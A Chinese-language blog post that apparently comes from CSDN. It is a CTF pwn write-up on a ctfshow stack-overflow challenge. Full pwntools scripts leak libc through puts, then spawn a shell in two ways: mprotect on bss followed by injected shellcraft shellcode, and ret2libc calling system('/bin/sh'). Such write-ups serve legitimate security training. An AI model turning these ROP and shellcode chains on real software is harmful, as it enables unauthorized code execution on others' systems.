mprotect,ret2libc

最新推荐文章于 2024-02-04 00:09:32 发布
最新推荐文章于 2024-02-04 00:09:32 发布
阅读量744 收藏 20
点赞数 19
分类专栏: pwn 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_79879963/article/details/135886248
版权

当一道题libc基址被屏幕前聪明的小子拿到时,“我们可以就干很多事了”,比如mprotect

先来讲讲mprotect:

要想使用mprotect,得先了解32位和64位寄存器调用顺序,一般来说主要用到前三个寄存器

32位调用顺序

ebx

ecx

edx

ep:read(ebx,ecx,edx)

64位调用顺序

rdi

rsi

rdx

ep:read(rdi,rsi,rdx)

32位是先调用函数再从栈调用参数

64位是先把参数存好,然后调用函数,函数取相应寄存器调用参数

然后来讲讲mprotect函数的使用规则:mprotect(起始地址(要把后三位地址换成000),长度,0-7(取决于你想把目标地址权限改成什么样儿,一般改成7:可读可写可执行))

实践:

checksec:只有一个NX

ida反编译main函数:

init函数是一个初始化函数不用看

进入logo函数我们也可以看到这道题提示了用mprotect函数

最后进入ctfshow函数:

看到gets函数,那么就存在栈溢出了,shift+f12看了一下也是没有后门函数什么的

那么直接从gets函数下手写脚本,首先把libc基址泄露出来:

寄存器地址我们用ropgadget来获取:

ROPgadget --binary pwn  --only 'pop|ret'

 

from pwn import *
context(os='linux',arch='amd64',log_level='debug')
p=process("./pwn2")
libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
elf=ELF("./pwn2")
def bug():
	gdb.attach(p)
	pause()

rdi=0x00000000004007e3


p.recvuntil("Hello CTFshow\n")
pay=b'a'*(0x20+8)+p64(rdi)+p64(elf.got['puts'])+p64(elf.plt['puts'])+p64(0x400637)
bug()
p.sendline(pay)


p.interactive()

 跑一下脚本:

打印出了puts的函数地址,再接收一下,用函数地址减去函数偏移得到libc基址:

read_addr=u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
print(hex(read_addr))
libc_base=read_addr-libc.sym['puts']
print(hex(libc_base))

果然也是成功打印出来了:

接着用基址加上mprotect函数的偏移得到真实地址:

mprotect=libc_base+libc.sym['mprotect']

 接下来进入第二次读入:

这时就开始使用mprotect函数来修改一段bss权限,先用ropgadget获取一下另外两个寄存器rsi,rdx

如果上面那条指令找不到我们可以使用:

ROPgadget --binary /lib/x86_64-linux-gnu/libc.so.6  --only 'pop|ret'

 但是这样获得的寄存器地址都是偏移,需要加上libc基址

之后按顺序把参数弹到三个寄存器里再调用mprotect函数:

pay=b'a'*(0x20+8)+p64(rdi)+p64(bss)+p64(rsi)+p64(0x1000)+p64(rdx_r12)+p64(7)*2+p64(mprotect)

进入调试看一看程序是否按照我们的预想在第二次读入后进入了mprotect函数:

果然是进入了mprotect函数,再ni就ni不动了,因为我们还没有填入返回地址,接下来再将返回地址修改为bss,但是到这我们只是修改了bss的权限,以及返回到bss并没有获取权限的操作,那么接下来需要再使用

shell=asm(shellcraft.sh())

 写出一段shellcode,那么因此还需要再借助一个读入函数来让我们的shellcode读入到bss里面,完整脚本如下:

from pwn import *
context(os='linux',arch='amd64',log_level='debug')
p=process("./pwn2")
libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
elf=ELF("./pwn2")
def bug():
	gdb.attach(p)
	pause()

rdi=0x00000000004007e3


p.recvuntil("Hello CTFshow\n")
pay=b'a'*(0x20+8)+p64(rdi)+p64(elf.got['puts'])+p64(elf.plt['puts'])+p64(0x400637)
bug()

p.sendline(pay)

read_addr=u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
print(hex(read_addr))
libc_base=read_addr-libc.sym['puts']
print(hex(libc_base))
mprotect=libc_base+libc.sym['mprotect']

rsi=libc_base+0x000000000002601f
rdx_r12=libc_base+0x0000000000119431
bss=0x602000

p.recvuntil("Hello CTFshow\n")
pay=b'a'*(0x20+8)+p64(rdi)+p64(bss)+p64(rsi)+p64(0x1000)+p64(rdx_r12)+p64(7)*2+p64(mprotect)+p64(rdi)+p64(bss)+p64(elf.plt['gets'])+p64(bss)
bug()
p.sendline(pay)

pause()
shell=asm(shellcraft.sh())
p.sendline(shell)
p.interactive()

 这样就成功获取权限:

另一种方法ret2libc就相对于mprotect要简单一点了,按照常规做法

read_addr=u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
print(hex(read_addr))
libc_base=read_addr-libc.sym['puts']
print(hex(libc_base))
system=libc_base+libc.sym['system']
bin_sh=libc_base+libc.search(b"/bin/sh\x00").__next__()

在第二次读入的时候直接使用system /bin/sh即可获取权限,完整脚本:

from pwn import *
context(os='linux',arch='amd64',log_level='debug')
p=process("./pwn2")
libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
elf=ELF("./pwn2")
def bug():
	gdb.attach(p)
	pause()

rdi=0x00000000004007e3


p.recvuntil("Hello CTFshow\n")
pay=b'a'*(0x20+8)+p64(rdi)+p64(elf.got['puts'])+p64(elf.plt['puts'])+p64(0x400637)


p.sendline(pay)

read_addr=u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
print(hex(read_addr))
libc_base=read_addr-libc.sym['puts']
print(hex(libc_base))
system=libc_base+libc.sym['system']
bin_sh=libc_base+libc.search(b"/bin/sh\x00").__next__()

p.recvuntil("Hello CTFshow\n")
pay=b'a'*(0x20+8)+p64(rdi)+p64(bin_sh)+p64(rdi+1)+p64(system)
p.sendline(pay)

Cherish....
关注
  • 19
    点赞
  • 20
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
linux内核那些事之Memory protection keys(硬件原理)
weixin_42730667的博客
11-19 2716
mprotect/map原理及缺陷 《linux 关于虚拟内存的几个系统调用》,提及到用户程序可以通过mprotect或者map(MAP_FIXED)系统调用可以根据需要再次修改已经申请过的进程内存的访问权限,其修改原理主要就是申请page table entry中的读写权限,以一个经典的X86 64 entry为例: 每次通过mprotect/map修改权限时,都会修改地址转换表中相对应的的page table entry中的R/W。由于通常CPU地址转换是以page(4K)大小为单位,所以每次.
Linux中mprotect()函数详解
qq_15762939的博客
01-29 1万+
测试源码 //mmp.c #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <sys/mman.h> int *g_ps32Result; void add(int a, int b) { *g_ps32Result = a + b; } void s...
Linux下查看内存使用状况的命令:free -h
JoggingPig的博客
08-19 1998
total:指一共有多少内存; used:正在被使用的内存; free:完全空闲中的内存; shared:共享内存(无实际用处?) buffer/cache:缓存缓冲内存; available:真实可用的内存; cache(内存中的高速缓存)的作用:提高cpu读取数据的速度;(访内存比访问外存花费时间少,划分部分内存作为缓存区,提高性能---高效率的读) buffer(内存中的缓冲区):为了提高写硬盘的速度;(高效率的写) 参考书籍:运维手册 ...
pwn入门之mprotect函数的利用
wangxunyu6的博客
01-24 1138
所以payload的意思就是先调用mprotect函数通过pop将原本的参数覆盖为我们想要的参数,然后返回到read函数,然后pop弹掉read的参数,把第二个参数改为bss的地址,读入shellcode。通过gadget找到一个含有三个pop一个ret指令的地址,我们要通过这个指令将mprotect函数原来的参数pop走,让我们能够填入我们想要的参数.pop_ebx_esi_ebp_ret=0x80a019b然后就是构造payload了先上代码。这题是64位的所以着重讲一下pay的构造。
Linux中mprotect()函数的用法
热门推荐
Roland_Sun的专栏
06-23 5万+
mprotect()函数修改在内存映像上的保护模式。 函数原型: #include    #include    int mprotect(const void *start, size_t len, int prot); mprotect把自start开始的内存区的保护模式修改为prot指定的值,如果执行成功返回0,如果执行失败,mprotect返回-1,并且设置errno变量。
浅谈mprotect函数和mmap函数
Rt1Text的博客
06-27 1031
在Linux中,mprotect()函数可以用来修改一段指定内存区域的权限。 细说参数一句话mprotect()函数把自start开始的、长度为len的内存区的保护属性修改为prot指定的值。注意几点: mmap函数 首先了解内存映射:内存映射:(可以类别数学中函数的映射关系,抽象类比的理解这种关系或者说是过程)将用户空间的一段内存区域映射到内核空间,映射成功后,用户对这段内存区域的修改可以直接反映到内核空间,同样,内核空间对这段区域的修改也直接反映用户空间通俗点理解嘛:就是你和镜子中的你,你发
c++-mprotect.tar.gz
10-27
为了让应用在踩内存时就发生崩溃(这样可以使用gdb调试,或分析其coredump),一种方法是将C++类对象配置成只读属性;可用的系统调用为mprotect,它可以配置一段对页对齐的内存区域内存的读写属性。
macos-golink-wrapper:解决“syscall.Mprotect panic
05-30
macos-golink-包装器使用或时,在macOS Catalina 10.15.x上的Golang中对“ syscall.Mprotect紧急:权限被拒绝”的解决方案这个怎么运作链接max_prot值更改为0x7 。 参考问题: : 用法假设 Go 安装在/opt/go 导航到...
重磅!!VMProtect Ultimate 3.3.1 Build 1076 旗舰版带Licensed
01-19
VMProtect 是新一代的软件保护系统,将保护后的代码放到虚拟机中运行,这将使分析反编译后的代码和破解变得极为困难。 2018年12月26日更新 [+] PE:增加了对“Control Flow Guard”的支持[+] PE:增加了PDB文件的...
定位多线程内存越界问题实践总结
02-05
最后,使用强大的mprotect+backtrace+libsigsegv等工具成功定位了问题。整个定位过程遇到的问题和解决办法对于多线程内存越界问题都很典型,简单总结一下和大家分享。只对终极组合秘技感兴趣的同学,请直接阅读最后...
linux编程之mprotect
云计算?
11-06 616
mprotect: 设置内存访问权限 mmap 的第三个参数指定对内存区域的保护,由标记读、写、执行权限的 PROT_READ、PROT_WRITE 和 PROT_EXEC 按位与操作获得,或者是限制没有访问权限的 PROT_NONE。如果程序尝试在不允许这些权限的本地内存上操作,它将被 SIGSEGV 信号(Segmentation fault,段错误)终止。 在内存映射完成后,这些...
mprotect排查全局变量内存被篡改问题
最新发布
攀的博客
02-04 963
内存篡改
linux中的mprotect()函数:set protection on a region of memory
谢白羽
08-18 729
文章目录1.头文件2.函数作用3.函数及参数描述4.示例代码 1.头文件 #include <sys/mman.h> 2.函数作用 1.mprotect() changes protection for the calling process’s memory page(s) containing any part of the address range in the interval [addr, addr+len-1]. addr must be aligned to a page
pwn小白入门06--ret2libc
weixin_45943522的博客
10-25 8098
概述: 前文介绍了ROP的基本原理,但前面的方法有一些局限性,一旦目标程序调用的函数较少,或者使用动态编译,就会导致我们可以利用的gadget变少,从而无法达到利用效果。为了解决这种问题,我们可以选择使用ROP的方式,到动态链接库里面寻找gadget。即ret2libc。 动态链接库: 说动态链接库之前,先简单介绍一下库,库是一种软件组件技术,库里面封装了数据和函数,比如常用的printf,get函数。前文所说的ret2syscall所使用的程序是静态链接的,即在程序编译的时候就将整个库链接到程序中,一般这
mmap & mprotect详解
Y_peak的博客
02-17 1120
mmap&mprotect 最近做了一道题, 竟然不让用system和execve, 让用mmap 和 mprotect来解决。可是身为小白萌新的我,对此一脸懵逼, 查阅相关内容和文档, 写下这篇博客, 用来回顾和分享。 mmap函数 头文件: <sys/mman.h> 函数原型: void* mmap(void* start,size_t length,int prot,int flags,int fd,off_t offset); 作用: mmap将一个文件或者其它对象映
CTFshow-pwn入门-栈溢出pwn49(静态链接pwn-mprotect函数的应用)
T1ngSh0w的博客
07-08 1220
ctfshow-pwn入门-栈溢出pwn49-mprotect函数静态链接pwn的应用
mprotect: 设置内存访问权限 Linux GCC
liulilittle的博客
03-15 775
mmap 的第三个参数指定对内存区域的保护,由标记读、写、执行权限的 PROT_READ、PROT_WRITE 和 PROT_EXEC 按位与操作获得,或者是限制没有访问权限的 PROT_NONE。mprotect 的参数分别为内存区间的地址,区间的大小,新的保护标志设置。有一种监控内存访问的高级技巧,可以通过利用 mmap 和 mprotect 保护目标内存区间,然后当程序访问时候接收并处理 Linux 系统发送的 SIGSEGV 信号。这个句柄将解除内存保护,因而程序内存访问得以继续。
buuctf13-17题
XDiku的博客
01-29 135
ok
mprotect产生core
01-05
2. 权限错误:当试图以无效的权限对内存区域进行保护属性更改时,也可能导致产生core文件。例如,如果尝试将一个不可写的内存区域设置为可写,或将一个不可执行的区域设置为可执行。 3. 内存操作冲突:如果在对内存...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值